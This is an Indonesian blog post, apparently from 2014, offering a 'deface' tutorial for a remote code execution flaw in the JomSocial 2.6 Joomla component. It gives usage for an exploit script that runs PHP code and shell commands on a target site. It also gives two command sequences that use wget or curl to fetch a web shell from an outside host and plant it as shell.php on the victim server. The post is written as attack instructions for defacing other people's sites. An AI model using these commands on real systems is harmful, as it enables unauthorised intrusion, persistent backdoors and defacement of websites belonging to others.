Monday, 31 March 2014

JomSocial 2.6 - Remote Code Execution

0 comments


Sudah lama tidak membahas mengenai deface mendeface, kesempatan kali ini admin akan memberikan trik deface yaitu "JomSocial 2.6 - Remote Code Execution" langsung saja silahkan simak tutorial dibawah :

JomSoc adalah perangkat komponen joomla yang memungkinkan Anda untuk membuat situs jaringan sosial canggih yang populer bebas penggunaannya dan open source software joomla.

Pada komponen Jomsocial versi 2.6 terdapat bug Rce ( Remote Code Execution ) yang memungkinkan attacker mengeksekusi kode� berbahaya untuk mengeksploitasi web yg memakai komponen ini.

Bahan sebelum beraksi download bahannya :

? Exploit
? Python 27

Step- step :

? Install Python
? Open cmd
? Masuk dir dimana exploit berada
? Jalankan exploit


Perintah:
1. exploit.py -u http://127.0.0.1/index.php -opsi

Macam opsi:
1. u -> url / web target format : http://situs.com/index.php
2. p -> mengeksekusi kode php : "echo 'Hello World!';"
3. s -> mengeksekusi command shell : "netstat -n" dll .
4. c -> menggunakan pemakaian functions : passthru

? Cara tanam shell

trik a:
1. exploit.py -u http://127.0.0.1/index.php -s "wget http:situs.com/shell.txt"
2. exploit.py -u http://127.0.0.1/index.php -s "mv shell.txt shell.php"

trik b:
1. exploit.py -u http://127.0.0.1/index.php -s "curl http:situs.com/shell.txt -o shell.php"

Demikian artikel yang dapat kami berikan, artikel ini kami ambil dari User Sanjungan Jiwa di forum kami, jika ada kendala atau masalah saat menjalankan tutorial ini silahkan langsung menuju threadnya disini.

Trimakasih,
Thanks to : Sanjungan Jiwa

Author : Bimo Septiawan

Leave a Reply

berilah kritik dan saran yang baik. kritik dan saran anda berguna sekali bagi saya.